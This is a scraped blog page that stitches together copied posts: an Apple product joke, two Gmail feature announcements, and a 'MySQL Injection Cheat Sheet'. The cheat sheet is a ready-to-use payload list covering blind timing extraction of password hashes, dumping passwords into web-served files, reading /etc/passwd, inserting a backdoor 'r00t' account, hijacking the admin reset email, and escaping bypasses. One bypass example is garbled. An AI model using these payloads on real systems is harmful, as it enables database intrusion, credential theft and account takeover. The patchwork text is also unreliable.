Note: Most of the Article of this blog has taken from another reputated blogs,Websites so Author will not responsible for any Issue.

After the iPad? The iBoard and iMat

7:53 AM , Posted in , , ,


Most people don't like the way Apple rolls out products. The company releases a device, only to roll out the "next version" a year later. The newer model usually contains only a few minor tweaks, which could have been implemented on the original (copy-paste on the iPhone anyone?).

It was this mindset that had people criticizing the iPad. "It's just a giant iPhone," they said. "It even runs the same OS as the iPhone and iPod Touch!" Well here's one for the people who think Apple's line of products has gotten just a bit too linear.
The folks over at begeek.fr have predicted the next two iterations of the Apple iPad. Behold! The iBoard and the iMat!

MySQL Injection Cheat Sheet Basics

4:26 AM , Posted in

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors.

Operators

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate

all render TRUE or 1.
SELECT 0.1 <= 2; SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost

Using the timeout to check if user exists

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of of the N rounds, add an extra zero and it could stall or crash your
browser!

Gathering info

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))

Note: You must specify a new file, it may not exist! and give the correct
pathname!

The CHAR() quoteless function

SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

example:

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login

explaining: (passwordfield,startcharacter,selectlength)

is like: (password,1,2) this selects: ‘ab’
is like: (password,1,3) this selects: ‘abc’
is like: (password,1,4) this selects: ‘abcd’

A quoteless example:

SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars: 0 to 9 – ASCII 48 to 57 ~ a to z – ASCII 97 to 122

Misc

Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user

load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for “forgot login retrieval.”

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding

WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string"
に関する追加情報:

the above chars are Chinese Big5

Advanced Vectors
Using an HEX encoded query to bypass escaping.

Normal:

SELECT * FROM login WHERE user = 'root'

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal:

insert into login set user = ‘root’, pass = ‘root’

Bypass:

insert into login set user = 0x726F6F74, pass = 0x726F6F74

How to determin the HEX value for injection.

SELECT HEX('root');

gives you:

726F6F74
then add:

0x

A preview of Gmail’s new look

6:31 AM , Posted in ,

We get a lot of great feedback about how Gmail helps you be more efficient, keep in touch with family and friends, and get work done. We’ve saved you from forgetting attachments and made sure that you got the right Bob. Over the years, adding countless features to Gmail has made it an increasingly powerful communication hub, but along the way the interface has also become more cluttered and complex.

That’s one of the reasons we’re embarking on a series of interface updates to help strip out unnecessary clutter and make Gmail as beautiful as it is powerful. This is part of a Google-wide effort to bring you an experience that’s more focused, elastic, and effortless across all of our products. The changes are not going to happen all at once. We know that you love and care about Gmail as much as we do, and we’ll be working on these upgrades gradually over the next few months to allow plenty of time to understand and incorporate your feedback into the evolving design.

We’re kicking things off with two new themes for you to try out as a sort of sneak peek at what we’re up to. Starting today, you’ll see the “Preview” and “Preview (Dense)” themes in the Themes tab in Gmail Settings. Why two themes? Our new interface will eventually expand dynamically to accommodate different screen sizes and user preferences, but until then you can pick the information density that you prefer. 

Here’s what one of the new themes currently looks like:



And in conversation view:


Click the images above to see larger versions.

If you poke around you’ll hopefully find a lot to like and a much cleaner, modern look but also few rough edges. In particular, some Labs features may look a little strange in the new themes. We plan to fix these issues as we roll out changes in the coming months. You can also expect some updated themes that embody the same design principles but are better suited to working in a dark environment, use a different color palette, or include the illustrations that we know many of you love to see around your inbox.

Look out for these and other new features over the next few months. In the meantime, try out the new themes as a preview of the future of Gmail and let us know what you think.

P.S. Like Gmail, Google Calendar is also getting a new look. You’ll see it automatically within the next few days so there’s no need to turn it on, and we’ll also continue to make improvements there in the coming months. Details about the current changes to Calendar can be found in the Calendar help center

New! Pick your favorite inbox style

6:30 AM , Posted in ,

Ever felt like there should be a better way to manage your inbox? There are already lots of different ways: some people read everything, some mark messages they need to take action on with stars, and others like to have their important email separated from the rest automatically — something Gmail started offering last year with Priority Inbox.

Over the coming weeks, we're rolling out several new inbox styles to help you manage your mail in the way that works best for you. Once it’s turned on for your account, you can easily choose a style from the tabs at the top of your inbox:

  • Classic - This is the default inbox style most people are used to. In the Classic inbox, messages are ordered chronologically, with your most recent email at the top.
  • Priority Inbox - Important and unread messages appear at the top of your inbox, then starred messages, then everything else. Each section can be customized further, so you can create your own inbox style.
  • Important first - This style puts important mail at the top of the page (both read and unread messages). Everything else is in its own section at the bottom of your inbox. You may have noticed that we turned on importance arrows for everyone a few weeks ago; this inbox style separates messages with these arrows from those without.
  • Unread first - Simple: unread mail at the top; everything else at the bottom.
  • Starred first - Starred messages at the top; everything else at the bottom.
After you've settled on a style you like and used it for about a week, these tabs will go away, You can always change your inbox style from the drop down menu next to the Inbox label or from theSettings page.



So try on a new inbox style and see what fits you best!

Subscribe to: Posts (Atom)
Twitter Delicious Facebook Digg Stumbleupon Favorites More
Follow me!Follow Us on Twitter!